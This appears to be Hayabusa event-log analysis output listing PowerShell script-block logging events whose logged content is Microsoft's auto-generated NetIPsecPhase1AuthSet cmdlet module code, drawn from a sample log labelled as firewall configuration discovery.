[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] 
[Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] 
param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw 
} } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmd",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 
'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 